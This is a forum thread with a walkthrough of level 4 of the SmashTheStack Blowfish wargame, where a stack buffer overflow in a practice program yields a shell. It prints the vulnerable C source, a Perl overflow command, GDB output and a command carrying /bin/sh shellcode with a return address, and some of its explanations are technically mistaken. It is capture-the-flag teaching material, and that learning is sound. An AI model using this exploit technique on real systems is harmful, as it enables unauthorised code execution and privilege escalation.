iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (1)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
[STS]Level 4 - Blowfish
  • chroniccommand
    Posts: 1,389
    I will now be going over level 4 of SmashTheStack's blowfish series.

    Part 1 - Logging in
    SSH to 
    level4@blowfish.smashthestack.org port 2222

    And use the password acquired from Level 3. You should get this login banner.

    ssh level4@blowfish.smashthestack.org -p 2222


     1. Thou shalt NOT root or otherwise harm the box.
         2. Thou shalt NOT access any other network from this box.
         3. Thou shalt NOT use any other directory besides /tmp or /code for code. 
         4. Thou shalt give the root pass to l3thal if you manage to change it.

         Passwords are in /pass.
         There is a README in each users home directory.
         /tmp && /var/tmp will be flushed daily by cron.
         Use /code plz for umm, code ;D
         IF YOU LEAVE FILES IN /levels/tmp U SUCK ..plz remove them kthnx! ;D
         The password for the last level will get you into
         Tux, the more advanced wargame. Join #blowfish on 
         irc.smashthestack.org with any questions. 

         Admins - l3thal && cr 

         Forum: http://smashthestack.org/viewforum.php?id=10

    Last login: Thu Jan 28 16:08:31 2010 from host-studentw-142-173.dhcp.stevens-tech.edu

     There is a buffer overflow in /levels/level4 
     exploit it and move on to the next level!

     Here's a tutorial i wrote just for this level:

      - http://smashthestack.org/l3thal/bof.txt

     Have fun!!

    So this is our first ever Buffer OverFlow in SmashTheStack. How fun!

    Part 2 - Smashing that stack
    So now we follow the directions, and drop to 
    /levels

    And do an "ls" from here we see all the level.c source codes and the compiled sources. What we want to do now is cd to the tmp directory, and make a new directory. So
    cd /levels/tmp
    mkdir chronic
    cd chronic
    cp /levels/level4.c* .
    cp /levels/level4* .

    This will change to /levels/tmp, make a new directory, change to that directory, and copy the level's source code and compiled program. Now we need to see what we're dealing with. Preform this command:
    cat level4.c

    This will spit out the level4.c source code. It should look like this:

    #include <stdio.h>
     
    int main(int argc, char * argv[]) {
     
        char buf[256];
     
        if(argc == 1) {
            printf(\"Usage: %s input\n\", argv[0]);
            exit(0);
        }
     
        strcpy(buf,argv[1]);
        printf(\"%s\", buf);
     
    }

    This is a C code. If you've been following my C for newcomers guide, you should know a thing or two about C. This is setting the character of "buf" to 256. We can tell it's vulnerable because its using the function "strcpy" to copy the buffer into "argv[1]", then printing the buffer. Now if you read my "Smashing the stack" guide, you should know some basic maneuvers for OverFlows such as this one. We know Perl is installed on the system, so lets use that as an advantage. Try this:
    ./level4 `perl -e 'print \"A\"x300'`

    By now, you should know this is executing Perl's Print function on ./level4(The compiled level4.c program). What this is doing is printing the letter A(0x41 in hex), 300 times. The reason it is 300 is because the buffer is 256, and we must overflow it. The reason we cant just use 257 is because the compiler adds some "padding" to the program. So 300 should overflow just fine. We should get this output:
    Segmentation fault (core dumped)

    This means 300 was enough to dump the core, and the save return address was overwritten. So now we must open up the core with GDB. GDB is a disassembler that we will be using to disassemble the dumped core. Do an "ls" and you should see a file like "core.randomnumbers". We open up the core using this:
    gdb -c core.1571

    Change 1571 with the number after your core. This should open up GDB. It should look like this:

    GNU gdb 6.8-debian
    Copyright (C) 2008 Free Software Foundation, Inc.
    License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
    This is free software: you are free to change and redistribute it.
    There is NO WARRANTY, to the extent permitted by law.  Type \"show copying\"
    and \"show warranty\" for details.
    This GDB was configured as \"i486-linux-gnu\".
    Core was generated by `./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
    Program terminated with signal 11, Segmentation fault.
    [New process 17916]
    #0  0x41414141 in ?? ()

    So we see where the core was generated, with the A's. From here try typing this:
    i r

    This stands for "Info Registers". This will pull up all the programs registers.
    Look at the IR's and you should notice something called EIP. It should look like this:
    eip            0x41414141	0x4141414

    This is something me must pay attention to. EIP stands for Extended Instruction Pointer. It points the program to the next memory address. We can use this to our advantage by cramming ShellCode into the EIP. Shellcode is bytes of code written in Assembler that tell the program what to do. So now all we need to do is cram the shellcode in there, and we should get a privilege escalation. Try this code:
    ./level4 `perl -e 'print \"A\"x300 . \"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80\" . \"\xc4\xd9\xff\xbf\"'`

    This is what the shellcode looks like. The first part is the actual shellcode, and the second part is padding we use. We should get something that looks like this:
    sh-3.2$

    This means we now have a Stand Alone Shell. We can issue commands from here, but we still don't have privileges to read from /pass/level5. Oh man :/
    This can be easily fixed. It's because we didn't preform it on the actual level4, only the one in the tmp directory. Figure out what to do from here. If you do it right then you should have a stand alone shell, and ability to read from /levels/level5

    --Chroniccommand
  • Xin
    Posts: 3,251
    Good job im gonna start these when i get the chance :)
    Xin
  • chroniccommand
    Posts: 1,389
    No problem I worked hard on this :P
  • x3n0n
    Posts: 110
    When I try to get the adress of my NOP sled (x/20s $esp) it doesn't show where the NOP is written :S
    Any thoughts on that?[hr]
    Never mind, I figured it out ;)
    --> x/2000xb $esp
    It displays the content of the stack adresses in another way (a way where you can spot everything much better)
  • h4ckingURLife
    Posts: 125
    Hmm, interesting. Thanks for the share, I bookmarked. :)
Add a Comment